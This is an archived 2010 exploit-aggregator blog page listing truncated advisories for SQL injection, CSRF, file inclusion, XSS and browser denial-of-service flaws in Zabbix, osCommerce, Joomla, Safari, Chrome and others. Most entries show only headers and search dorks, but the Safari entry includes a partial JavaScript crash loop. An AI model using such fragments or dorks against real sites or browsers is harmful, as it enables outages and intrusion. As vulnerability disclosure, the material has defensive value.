grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for April 30th, 2010

Zabbix <= 1.8.1 SQL Injection Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Zabbix <= 1.8.1 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Zabbix <= 1.8.1 SQL Injection Vulnerability
===========================================
# Exploit Title: Zabbix <= 1.8.1 SQL Injection Vulnerability
# Date: 27/04/2010
# Author: skys
# Software Link: http://www.zabbix.com/
# Version:Web Application
# Tested on: Apache/*nix
# Dork: intext: "by SIA Zabbix"
# Code [...]

Leave a Comment

Safari 4.0.3 & 4.0.4 Stack Exhaustion

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Safari 4.0.3 & 4.0.4 Stack Exhaustion</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================
Safari 4.0.3 & 4.0.4 Stack Exhaustion
=====================================
<script>
//Written by: Fredrik Nordberg Almroth
//URL: http://h.ackack.net/
//Affected: Safari 4.0.3 & 4.0.4 – Other versions might be vulnerable aswell.
a="<script>var b="<iframe src=’javascript:window.location="boom"’></iframe>";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
while(1){
a=a+a;
[...]

Leave a Comment

gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
=============================================
Author : Giuseppe ‘giudinvx’ D’Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-29-2010
Site : http://www.giudinvx.altervista.org/
Location : Naples, Italy
——————————————————–
Application Info
Site : http://www.gpeasy.com/
Version: [...]

Leave a Comment

XT-Commerce v1 Beta 1 => by Pass / Creat + Download Backup Vuln

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>XT-Commerce v1 Beta 1 => by Pass / Creat + Download Backup Vuln</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================================
XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability
==========================================================================
========================================================================================
| # Title : XT-Commerce v1 Beta 1 => by [...]

Leave a Comment

Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit
====================================================================
<?php
################################################################################
# Exploit Title: Callisto <= 1.1.5 pl5 SQL Injection / Credentials [...]

Leave a Comment

phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit
==============================================================
<?php
################################################################################
# Exploit Title: phpBB modified by Przemo <= 1.12.6p4 Denial Of [...]

Leave a Comment

Scratcher (SQL/XSS) Multiple Remote Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Scratcher (SQL/XSS) Multiple Remote Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Scratcher (SQL/XSS) Multiple Remote Vulnerability
=================================================
[+] Scratcher (SQL/XSS) Multiple Remote Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Puntal 2.1.0 Remote File Inclusion Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Puntal 2.1.0 Remote File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Puntal 2.1.0 Remote File Inclusion Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

osCommerce v3.0a5 Multiple Vulnerabilities

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>osCommerce v3.0a5 Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================
osCommerce v3.0a5 Multiple Vulnerabilities
==========================================
# [Vendor SW]: osCommerce
# [Version]: 3.0a5 (but possible all versions)
# [Vendor URL]: www.oscommerce.com
# [...]

Leave a Comment

ASPCode CMS <= v1.5.8 Multiple Vulnerabilities

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ASPCode CMS <= v1.5.8 Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
ASPCode CMS <= v1.5.8 Multiple Vulnerabilities
==============================================
# Multiple Vulnerability in ASPCode CMS
#
# [Software Version]: <= v1.5.8
# [Vendor WebSite]: www.aspcodecms.com
# [Date]: 01 January 2010
#
# Found by Alberto "fulgur" Fontanella
#
# itsicurezza<0×40>yahoo.it – ictsec.wordpress.com
#
#
[1] – [Multiple [...]

Leave a Comment

AutoDealer Ver.1 and Ver.2 MSSQLi Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>AutoDealer Ver.1 and Ver.2 MSSQLi Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
AutoDealer Ver.1 and Ver.2 MSSQLi Vulnerability
===============================================
# vendor :http://www.aspsiteware.com/Auto.asp
# Date: 30 apr,2010
# Dork:Copyright © 2010 ASP SiteWare. All rights reserved.
————————————————————————————–
#####################Sid3^effects aKa HaRi##################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks:*L0rd ?rusAd?r*,d4rk-blu?®,R45C4L idi0th4ck3r,CR4C|< [...]

Leave a Comment

New-CMS v1.08 Multiple Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>New-CMS v1.08 Multiple Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================
New-CMS v1.08 Multiple Vulnerability
====================================
# [Vendor SW]: New-CMS
# [Version]: 1.08 (but possible all versions)
# [Vendor URL]: www.new-cms.org
# [Tested on]: Ubuntu Server 9.10
# [Category]: Webapps/0day
#
# [Date]: 17 Feb 2010
# [Author]: Alberto "fulgur" Fontanella
# [Author URL]: ictsec.wordpress.com
# [...]

Leave a Comment

JobPost SQL Injection Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>JobPost SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================
JobPost SQL Injection Vulnerability
===================================
# vendor :http://www.aspsiteware.com/job.asp
# Author:Sid3^effects
# Code :
————————————————————————————–
#####################Sid3^effects aKa HaRi##################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks:*L0rd ?rusAd?r*,d4rk-blu?®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
#ShouTZ:kedar,dec0d3r,41.w4r10r
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
Description :
JobPost is an application ideal for [...]

Leave a Comment

B2B Gold Script (id) SQL Injection Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>B2B Gold Script (id) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
B2B Gold Script (id) SQL Injection Vulnerability
================================================
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : [...]

Leave a Comment

EC21 Clone 3.0 (id) SQL Injection Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>EC21 Clone 3.0 (id) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
EC21 Clone 3.0 (id) SQL Injection Vulnerability
===============================================
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : [...]

Leave a Comment

Apache ActiveMQ version 5.3.x XSS Vulnerabilities

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Apache ActiveMQ version 5.3.x XSS Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Apache ActiveMQ version 5.3.x XSS Vulnerabilities
=================================================
Severity: Medium
Overview:
———
Apache ActiveMQ is prone to cross-site scripting vulnerability.
Technical Description:
———————-
The issue is caused due to the problem in Jetty’s error handler that doesn’t escape the message.
Impact:
——–
An attacker [...]

Leave a Comment

Google Chrome acronym tag denial of service exploit

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Google Chrome acronym tag denial of service exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
Google Chrome acronym tag denial of service exploit
===================================================
<html>
<title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title>
<head>
<script>
// Open it a couple of times, it might [...]

Leave a Comment

Joomla Component com_newsfeeds SQL injection vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_newsfeeds SQL injection vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Component com_newsfeeds SQL injection vulnerability
==========================================================
# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :
Email : archimondera@gmail.com
Website : xgroupvn.org – [...]

Leave a Comment

Webthaiapp detail.php(cat) Blind Sql injection Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Webthaiapp detail.php(cat) Blind Sql injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Webthaiapp detail.php(cat) Blind Sql injection Vulnerability
============================================================
–==+==================================================+==–
–==+ Webthaiapp detail.php(cat) Blind Sql injection
Vulnerability [...]

Leave a Comment

Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability

Apr.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================================
Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability
===================================================================
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : [...]

Leave a Comment

« previous entries

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News